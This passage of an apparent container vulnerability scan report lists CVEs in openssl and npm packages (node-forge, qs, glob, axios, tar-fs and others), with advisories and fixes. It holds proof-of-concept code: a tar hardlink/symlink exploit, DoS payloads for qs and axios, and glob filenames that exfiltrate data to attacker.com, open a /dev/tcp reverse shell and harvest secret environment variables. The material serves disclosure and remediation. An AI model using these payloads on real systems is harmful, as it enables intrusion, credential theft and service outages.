const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Impact

  • Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
  • Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
critical: 0 high: 3 medium: 0 low: 0 openssl 3.5.0-r0 (apk)

pkg:apk/alpine/openssl@3.5.0-r0?os_name=alpine&os_version=3.22

high : CVE--2025--9230

Affected range<3.5.4-r0
Fixed version3.5.4-r0
EPSS Score0.029%
EPSS Percentile8th percentile
Description

high : CVE--2025--69420

Affected range<3.5.5-r0
Fixed version3.5.5-r0
EPSS Score0.030%
EPSS Percentile8th percentile
Description

high : CVE--2025--69419

Affected range<3.5.5-r0
Fixed version3.5.5-r0
EPSS Score0.030%
EPSS Percentile8th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 node-forge 1.3.1 (npm)

pkg:npm/node-forge@1.3.1

high 8.7: CVE--2025--66031 Uncontrolled Recursion

Affected range<1.3.2
Fixed version1.3.2
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.110%
EPSS Percentile30th percentile
Description

Summary

An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.

Details

An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.

Impact

This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.

This vulnerability impacts the ans1.fromDer function in node-forge before patched version 1.3.2.

Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.

high 8.7: CVE--2025--12816 Interpretation Conflict

Affected range<1.3.2
Fixed version1.3.2
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.057%
EPSS Percentile18th percentile
Description

Summary

CVE-2025-12816 has been reserved by CERT/CC

Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.

Details

A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.

This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).

Impact

This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.

This vulnerability impacts the ans1.validate function in node-forge before patched version 1.3.2.
https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js.

The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js

Any downstream application using these components is impacted.

These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.

critical: 0 high: 1 medium: 0 low: 0 qs 6.13.0 (npm)

pkg:npm/qs@6.13.0

high 8.7: CVE--2025--15284 Improper Input Validation

Affected range<6.14.1
Fixed version6.14.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.150%
EPSS Percentile36th percentile
Description

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  • arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  • Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  1. Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  2. Application parses with qs.parse(query, { arrayLimit: 100 })
  3. qs ignores limit, parses all 100,000 elements into array
  4. Server memory exhausted → application crashes or becomes unresponsive
  5. Service unavailable for all users

Real-world impact:

  • Single malicious request can crash server
  • No authentication required
  • Easy to automate and scale
  • Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

critical: 0 high: 1 medium: 0 low: 0 qs 6.14.0 (npm)

pkg:npm/qs@6.14.0

high 8.7: CVE--2025--15284 Improper Input Validation

Affected range<6.14.1
Fixed version6.14.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.150%
EPSS Percentile36th percentile
Description

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  • arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  • Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  1. Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  2. Application parses with qs.parse(query, { arrayLimit: 100 })
  3. qs ignores limit, parses all 100,000 elements into array
  4. Server memory exhausted → application crashes or becomes unresponsive
  5. Service unavailable for all users

Real-world impact:

  • Single malicious request can crash server
  • No authentication required
  • Easy to automate and scale
  • Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

critical: 0 high: 1 medium: 0 low: 0 jws 4.0.0 (npm)

pkg:npm/jws@4.0.0

high 7.5: CVE--2025--65945 Improper Verification of Cryptographic Signature

Affected range=4.0.0
Fixed version4.0.1
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score0.009%
EPSS Percentile1st percentile
Description

Overview

An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.

Am I Affected?

You are affected by this vulnerability if you meet all of the following preconditions:

  1. Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
  2. Application uses the jws.createVerify() function for HMAC algorithms
  3. Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

You are NOT affected by this vulnerability if you meet any of the following preconditions:

  1. Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
  2. Application uses only asymmetric algorithms (e.g. RS256)
  3. Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

Fix

Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1

Acknowledgement

Okta would like to thank Félix Charette for discovering this vulnerability.

critical: 0 high: 1 medium: 0 low: 0 connect-multiparty 2.2.0 (npm)

pkg:npm/connect-multiparty@2.2.0

high 7.8: CVE--2022--29623 Unrestricted Upload of File with Dangerous Type

Affected range<=2.2.0
Fixed versionNot Fixed
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.448%
EPSS Percentile63rd percentile
Description

An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.

critical: 0 high: 1 medium: 0 low: 0 glob 10.4.5 (npm)

pkg:npm/glob@10.4.5

high 7.5: CVE--2025--64756 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range>=10.2.0
<10.5.0
Fixed version11.1.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score0.038%
EPSS Percentile11th percentile
Description

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
critical: 0 high: 1 medium: 0 low: 0 async 0.9.2 (npm)

pkg:npm/async@0.9.2

high 7.8: CVE--2021--43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range<2.6.4
Fixed version2.6.4, 3.2.2
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.706%
EPSS Percentile72nd percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 linkifyjs 4.2.0 (npm)

pkg:npm/linkifyjs@4.2.0

high 8.8: CVE--2025--8101 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range<4.3.2
Fixed version4.3.2
CVSS Score8.8
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N
EPSS Score0.123%
EPSS Percentile32nd percentile
Description

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS Targeting HTML Attributes and Manipulating User-Controlled Variables.This issue affects Linkify: from 4.3.1 before 4.3.2.

critical: 0 high: 1 medium: 0 low: 0 axios 1.8.4 (npm)

pkg:npm/axios@1.8.4

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.109%
EPSS Percentile30th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 3.0.9 (npm)

pkg:npm/tar-fs@3.0.9

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=3.0.0
<3.1.1
Fixed version3.1.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.028%
EPSS Percentile7th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.4
Fixed version2.1.4
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.028%
EPSS Percentile7th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 qs 6.5.3 (npm)

pkg:npm/qs@6.5.3

high 8.7: CVE--2025--15284 Improper Input Validation

Affected range<6.14.1
Fixed version6.14.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.150%
EPSS Percentile36th percentile
Description

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
